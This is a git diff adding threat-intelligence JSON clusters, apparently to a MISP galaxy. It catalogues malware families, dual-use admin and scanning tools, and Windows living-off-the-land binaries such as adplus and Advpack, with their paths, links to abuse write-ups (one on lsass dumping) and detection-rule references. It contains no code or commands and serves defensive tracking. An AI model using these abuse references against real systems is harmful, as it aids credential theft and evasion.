+ "date_published": "2018-02-13T00:00:00Z", + "refs": [ + "https://securelist.com/zero-day-vulnerability-in-telegram/83800/" + ], + "source": "MITRE", + "title": "Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks" + }, + "related": [], + "uuid": "38fbd993-de98-49e9-8437-bc6a1493d6ed", + "value": "Kaspersky RTLO Cyber Crime" + }, + { + "description": "United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion" + ], + "source": "MITRE, Tidal Cyber", + "title": "Zhu Hua and Zhang Shilong" + }, + "related": [], + "uuid": "3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2", + "value": "DOJ APT10 Dec 2018" + }, + { + "description": "US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/page/file/1122671/download" + ], + "source": "MITRE", + "title": "Zhu Hua Indictment" + }, + "related": [], + "uuid": "79ccbc74-b9c4-4dc8-91ae-1d15c4db563b", + "value": "District Court of NY APT10 Indictment December 2018" + }, + { + "description": "LOLBAS. (2018, May 25). Zipfldr.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/" + ], + "source": "Tidal Cyber", + "title": "Zipfldr.dll" + }, + "related": [], + "uuid": "3bee0640-ea48-4164-be57-ac565d8cbea7", + "value": "Zipfldr.dll - LOLBAS Project" + }, + { + "description": "madler. (2017). zlib. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://github.com/madler/zlib" + ], + "source": "MITRE", + "title": "zlib" + }, + "related": [], + "uuid": "982bcacc-afb2-4bbb-9197-f44d765b9e07", + "value": "Zlib Github" + }, + { + "description": "Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8" + ], + "source": "MITRE", + "title": "Zone.Identifier Stream Name" + }, + "related": [], + "uuid": "2efbb7be-3ca1-444a-8584-7ceb08101e74", + "value": "Microsoft Zone.Identifier 2020" + }, + { + "description": "Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-11-23T00:00:00Z", + "refs": [ + "https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/" + ], + "source": "MITRE", + "title": "Zoom into Kinsing" + }, + "related": [], + "uuid": "4922dbb5-d3fd-4bf2-8af7-3b8889579c31", + "value": "Sysdig Kinsing November 2020" + } + ] +} diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json new file mode 100644 index 0000000..f71c97a --- /dev/null +++ b/clusters/tidal-software.json @@ -0,0 +1,33653 @@ +{ + "authors": "Tidal", + "category": "Software", + "description": "Tidal Software Cluster", + "name": "Tidal Software", + "source": "Tidal", + "type": "software", + "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "values": [ + { + "description": "[3PARA RAT](https://app.tidalcyber.com/software/71d76208-c465-4447-8d6e-c54f142b65a4) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0066", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "used-by" + }, + { + "dest-uuid": "7bec698a-7e20-4fd3-bb6a-12787770fb1a", + "type": "similar" + } + ], + "uuid": "71d76208-c465-4447-8d6e-c54f142b65a4", + "value": "3PARA RAT" + }, + { + "description": "[4H RAT](https://app.tidalcyber.com/software/a15142a3-4797-4fef-8ec6-065e3322a69b) is malware that has been used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c) since at least 2007. [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0065", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "used-by" + }, + { + "dest-uuid": "8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc", + "type": "similar" + } + ], + "uuid": "a15142a3-4797-4fef-8ec6-065e3322a69b", + "value": "4H RAT" + }, + { + "description": "", + "meta": { + "id": "cdfe3925-aa4a-4d22-940e-2aa6697a9911", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4665e52b-3c5c-4a7f-9432-c89ef26f2c93", + "type": "similar" + } + ], + "uuid": "b7942342-d390-408d-8d11-edff76322ff3", + "value": "7-zip" + }, + { + "description": "7-Zip is a tool used to compress files into an archive.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5023", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "b7942342-d390-408d-8d11-edff76322ff3", + "type": "similar" + } + ], + "uuid": "4665e52b-3c5c-4a7f-9432-c89ef26f2c93", + "value": "7-Zip" + }, + { + "description": "[AADInternals](https://app.tidalcyber.com/software/3d33fbf5-c21e-4587-ba31-9aeec3cc10c0) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.[[AADInternals Github](https://app.tidalcyber.com/references/643d3947-c0ec-47c4-bb58-5e546084433c)][[AADInternals Documentation](https://app.tidalcyber.com/references/320231a1-4dbe-4eaa-b14d-48de738ba697)]", + "meta": { + "platforms": [ + "Azure AD", + "Office 365", + "Windows" + ], + "software_attack_id": "S0677", + "source": "MITRE", + "tags": [ + "c9c73000-30a5-4a16-8c8b-79169f9c24aa", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "2c5281dd-b5fd-4531-8aea-c1bf8a0f8756", + "type": "similar" + } + ], + "uuid": "3d33fbf5-c21e-4587-ba31-9aeec3cc10c0", + "value": "AADInternals" + }, + { + "description": "[ABK](https://app.tidalcyber.com/software/394cadd0-bc4d-4181-ac53-858e84b8e3de) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0469", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "a0ebedca-d558-4e48-8ff7-4bf76208d90c", + "type": "similar" + } + ], + "uuid": "394cadd0-bc4d-4181-ac53-858e84b8e3de", + "value": "ABK" + }, + { + "description": "[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]", + "meta": { + "id": "d9cee454-5016-40f4-9c75-2b8eb684724d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "cce705c7-49f8-4b54-b854-fd4b3a32e6ff", + "type": "similar" + } + ], + "uuid": "9a77d9ce-dd34-4ff9-8b26-c74ef5055a2f", + "value": "AccCheckConsole.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Verifies UI accessibility requirements\n\n**Author:** bohops\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe\n\n**Resources:**\n* [https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340](https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340)\n* [https://twitter.com/bohops/status/1477717351017680899](https://twitter.com/bohops/status/1477717351017680899)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_acccheckconsole.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml)\n* IOC: Sysmon Event ID 1 - Process Creation\n* Analysis: [https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340](https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340)[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5203", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9a77d9ce-dd34-4ff9-8b26-c74ef5055a2f", + "type": "similar" + } + ], + "uuid": "cce705c7-49f8-4b54-b854-fd4b3a32e6ff", + "value": "AccCheckConsole" + }, + { + "description": "AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.[[Security Joes Sockbot March 09 2022](/references/bca2b5c2-bc3b-4504-806e-5c5b6fee96e6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5059", + "source": "Tidal Cyber", + "tags": [ + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + } + ], + "uuid": "6bc29df2-195e-410c-ad08-f3661575492f", + "value": "AccountRestore" + }, + { + "description": "[Action RAT](https://app.tidalcyber.com/software/202781a3-d481-4984-9e5a-31caafc20135) is a remote access tool written in Delphi that has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 against Indian and Afghani government personnel.[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1028", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "31bc763e-623f-4870-9780-86e43d732594", + "type": "used-by" + }, + { + "dest-uuid": "36801ffb-5c85-4c50-9121-6122e389366d", + "type": "similar" + } + ], + "uuid": "202781a3-d481-4984-9e5a-31caafc20135", + "value": "Action RAT" + }, + { + "description": "[adbupd](https://app.tidalcyber.com/software/f52e759a-a725-4b50-84f2-12bef89d369e) is a backdoor used by [PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74) that is similar to [Dipsind](https://app.tidalcyber.com/software/226ee563-4d49-48c2-aa91-82999f43ce30). [[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0202", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f036b992-4c3f-47b7-a458-94ac133bce74", + "type": "used-by" + }, + { + "dest-uuid": "0f1ad2ef-41d4-4b7a-9304-ddae68ea3005", + "type": "similar" + } + ], + "uuid": "f52e759a-a725-4b50-84f2-12bef89d369e", + "value": "adbupd" + }, + { + "description": "[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]", + "meta": { + "id": "d09bd642-055d-4626-8324-ff5d97488672", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "253f97c3-ba35-4064-8ec0-892872432214", + "type": "similar" + } + ], + "uuid": "200ecd1e-c1a6-41a3-bb9a-ee687334c2c1", + "value": "AddinUtil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** .NET Tool used for updating cache files for Microsoft Office Add-Ins.\n\n**Author:** Michael McKinley @MckinleyMike\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe\n\n**Resources:**\n* [https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html](https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_addinutil_suspicious_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_child_process.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_dir_exec.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml)[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5082", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "200ecd1e-c1a6-41a3-bb9a-ee687334c2c1", + "type": "similar" + } + ], + "uuid": "253f97c3-ba35-4064-8ec0-892872432214", + "value": "AddinUtil" + }, + { + "description": "[AdFind](https://app.tidalcyber.com/software/70559096-2a6b-4388-97e6-c2b16f3be78e) is a free command-line query tool that can be used for gathering information from Active Directory.[[Red Canary Hospital Thwarted Ryuk October 2020](https://app.tidalcyber.com/references/ae5d4c47-54c9-4f7b-9357-88036c524217)][[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)][[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0552", + "source": "MITRE", + "tags": [ + "3a633b73-9c2c-4293-8577-fb97be0cda37", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "f59508a6-3615-47c3-b493-6676e1a39a87", + "type": "similar" + } + ], + "uuid": "70559096-2a6b-4388-97e6-c2b16f3be78e", + "value": "AdFind" + }, + { + "description": "[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]", + "meta": { + "id": "86e4b24f-f2fd-428e-a1bc-5ce17899e6e9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3f229fe8-4d03-48ba-97b5-d7132510e090", + "type": "similar" + } + ], + "uuid": "1db1d4d7-d442-457d-afb9-5c3dcb21645a", + "value": "adplus.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe\n\n**Resources:**\n* [https://mrd0x.com/adplus-debugging-tool-lsass-dump/](https://mrd0x.com/adplus-debugging-tool-lsass-dump/)\n* [https://twitter.com/nas_bench/status/1534916659676422152](https://twitter.com/nas_bench/status/1534916659676422152)\n* [https://twitter.com/nas_bench/status/1534915321856917506](https://twitter.com/nas_bench/status/1534915321856917506)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_adplus.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5204", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1db1d4d7-d442-457d-afb9-5c3dcb21645a", + "type": "similar" + } + ], + "uuid": "3f229fe8-4d03-48ba-97b5-d7132510e090", + "value": "adplus" + }, + { + "description": "Advanced IP Scanner is a tool used to perform network scans and show network devices.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5024", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + } + ], + "uuid": "ff0af6fd-e4a1-47c9-b4a1-7ce5074e089e", + "value": "Advanced IP Scanner" + }, + { + "description": "Advanced Port Scanner is a tool used to perform network scans.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5006", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + } + ], + "uuid": "f93b54cf-a17c-4739-a7af-4106055f868d", + "value": "Advanced Port Scanner" + }, + { + "description": "AdvancedRun is a tool used to enable software execution under user-defined settings.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5025", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "7ef15943-8061-4941-b14e-9634c0b95d28", + "value": "AdvancedRun" + }, + { + "description": "[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]", + "meta": { + "id": "44a4a888-434d-46fa-998d-621999a2f99a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6c82fc65-864a-4a8c-80ed-80a69920c44f", + "type": "similar" + } + ], + "uuid": "0c7f7926-3935-46ea-b430-3841acab3120", + "value": "Advpack.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Utility for installing software and drivers with rundll32.exe\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\advpack.dll\n* c:\\windows\\syswow64\\advpack.dll\n\n**Resources:**\n* [https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/](https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/)\n* [https://twitter.com/ItsReallyNick/status/967859147977850880](https://twitter.com/ItsReallyNick/status/967859147977850880)\n* [https://twitter.com/bohops/status/974497123101179904](https://twitter.com/bohops/status/974497123101179904)\n* [https://twitter.com/moriarty_meng/status/977848311603380224](https://twitter.com/moriarty_meng/status/977848311603380224)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___advpack.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml)[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5187", + "source": "Tidal Cyber", + "tags": [ + "7a457caf-c3b6-4a48-84cf-c1f50a2eda27", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0c7f7926-3935-46ea-b430-3841acab3120", + "type": "similar" + } + ], + "uuid": "6c82fc65-864a-4a8c-80ed-80a69920c44f", + "value": "Advpack" + }, + { + "description": "", + "meta": { + "id": "3301e250-f632-4680-897c-137c01399ffb" + }, + "related": [ + { + "dest-uuid": "ef7f4f5f-6f30-4059-87d1-cd8375bf1bee", + "type": "similar" + } + ], + "uuid": "60d36859-4803-4a84-8ce6-b7aead8b0dd8", + "value": "AZZY" + }, + { + "description": "", + "meta": { + "id": "2d1033ed-dcb0-4ff8-b994-c27c7472e4e5" + }, + "related": [ + { + "dest-uuid": "ef7f4f5f-6f30-4059-87d1-cd8375bf1bee", + "type": "similar" + } + ], + "uuid": "87b3c2d9-49fa-4f4d-bcc0-91c610aafd3e", + "value": "EVILTOSS" + }, + { + "description": "", + "meta": { + "id": "ae90ab5b-29e8-41c2-b814-686e7e6f40f6" + }, + "related": [ + { + "dest-uuid": "ef7f4f5f-6f30-4059-87d1-cd8375bf1bee", + "type": "similar" + } + ], + "uuid": "aee4bdbe-dcdb-456e-b198-a9ec4dd0dea9", + "value": "NETUI" + }, + { + "description": "", + "meta": { + "id": "404e76ad-994c-4cc3-b20a-3d3d2143d8bf" + }, + "related": [ + { + "dest-uuid": "ef7f4f5f-6f30-4059-87d1-cd8375bf1bee", + "type": "similar" + } + ], + "uuid": "66cd7902-e578-4054-8dc4-a5e027e914b4", + "value": "Sedreco" + }, + { + "description": "[ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee) is a spying backdoor that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0045", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "16b47583-1c54-431f-9f09-759df7b5ddb7", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + 